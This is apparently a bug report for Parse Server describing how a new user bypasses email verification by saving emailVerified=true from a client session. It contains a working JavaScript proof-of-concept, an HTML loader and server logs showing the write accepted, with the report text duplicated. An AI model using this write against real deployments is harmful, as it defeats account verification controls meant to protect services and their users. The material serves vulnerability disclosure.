A user who has just signed up can set emailVerified=true without actually verifying the email address. In other words, the user does not have to click the link in the verification email to get their email address validated: the server accepts a plain client-session write to `emailVerified`, a field that should only be set by the server's own verification flow.
Steps to reproduce
Steps that reproduce the issue:
Set the following settings in server.js:
verifyUserEmails: true,
emailVerifyTokenValidityDuration: 2 * 60 * 60,
preventLoginWithUnverifiedEmail: true,
Sign up, set emailVerified: true and save the user. Here is a sample HTML page that does just that:
// Reproduction: a freshly signed-up client session writes emailVerified itself.
// With verifyUserEmails enabled the server is expected to reject (or ignore) this
// write; the Logs/Trace section below shows it being accepted instead.
const user = new Parse.User();
user.set("username", "hacker");
user.set("password", "passwd");
user.set("email", "hacker@example.com");

// Runs once the client-side write of emailVerified has been persisted.
function onVerifiedFlagSaved(userAgain) {
  alert('Save succeeded');
}

// Runs when the server refuses the write of emailVerified — the expected outcome.
function onVerifiedFlagRejected(userAgain, error) {
  alert(`Save failed with ${error.message}`);
}

// Runs after signup returns 201: perform the write the server should refuse.
function onSignupSucceeded(signedUpUser) {
  alert("Signup succeeded");
  signedUpUser.set("emailVerified", true);
  signedUpUser.save(null, {
    success: onVerifiedFlagSaved,
    error: onVerifiedFlagRejected,
  });
}

// Runs when signup itself fails; surfaces the Parse error code and message.
function onSignupFailed(signedUpUser, error) {
  alert(`Error: ${error.code}\n\nwhat is the error \n\n ${error.message}`);
}

user.signUp(null, {
  success: onSignupSucceeded,
  error: onSignupFailed,
});
A user who has just signed up can set emailVerified=true without actually verifying the email address. In other words, the user does not have to click the link in the verification email to get their email address validated: the server accepts a plain client-session write to `emailVerified`, a field that should only be set by the server's own verification flow.
Steps to reproduce
Steps that reproduce the issue:
Set the following settings in server.js:
verifyUserEmails: true,
emailVerifyTokenValidityDuration: 2 * 60 * 60,
preventLoginWithUnverifiedEmail: true,
Sign up, set emailVerified: true and save the user. Here is a sample HTML page that does just that:
<html>
<head>
<script type="text/javascript" src="https://npmcdn.com/parse/dist/parse.js"></script>
<script type="text/javascript">
// Configures the Parse JS SDK for the local dev server used in this report.
// Despite its name this function only initialises the SDK; the signup and the
// emailVerified write are done by the script shown earlier in the report.
function signupAndSetEmailVerified() {
  Parse.initialize('e5c10b31d8716509af3e571260');
  Parse.serverURL = 'http://127.0.0.1:8888/parse';
}
</script>
</head>
<body onload="signupAndSetEmailVerified()">
</body>
</html>
Expected Results
The save should fail, or at least emailVerified should still be false in the database for this user.
Actual Outcome
emailVerified is true in the database for this new user.
Environment Setup
Server
Database
Logs/Trace
verbose: REQUEST for [POST] /parse/users: {
"username": "hacker",
"password": "",
"email": "hacker@example.com"
} method=POST, url=/parse/users, host=127.0.0.1:1337, user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0, accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, accept-language=en-US,en;q=0.5, accept-encoding=gzip, deflate, content-type=text/plain, origin=null, x-forwarded-for=10.0.2.2, x-forwarded-host=127.0.0.1:8888, x-forwarded-server=localhost, connection=Keep-Alive, content-length=214, username=hacker, password=, email=hacker@example.com
verbose: RESPONSE from [POST] /parse/users: {
"status": 201,
"response": {
"objectId": "cyl7z1XcSe",
"createdAt": "2017-01-18T12:16:05.861Z",
"sessionToken": "r:c54acc4bbcf051b306c7d0f8d4982646"
},
"location": "http://127.0.0.1:8888/parse/users/cyl7z1XcSe"
} status=201, objectId=cyl7z1XcSe, createdAt=2017-01-18T12:16:05.861Z, sessionToken=r:c54acc4bbcf051b306c7d0f8d4982646, location=http://127.0.0.1:8888/parse/users/cyl7z1XcSe
verbose: REQUEST for [PUT] /parse/classes/_User/cyl7z1XcSe: {
"emailVerified": true
} method=PUT, url=/parse/classes/_User/cyl7z1XcSe, host=127.0.0.1:1337, user-agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0, accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, accept-language=en-US,en;q=0.5, accept-encoding=gzip, deflate, content-type=text/plain, origin=null, x-forwarded-for=10.0.2.2, x-forwarded-host=127.0.0.1:8888, x-forwarded-server=localhost, connection=Keep-Alive, content-length=235, emailVerified=true
verbose: RESPONSE from [PUT] /parse/classes/_User/cyl7z1XcSe: {
"response": {
"updatedAt": "2017-01-18T12:16:06.833Z"
}
} updatedAt=2017-01-18T12:16:06.833Z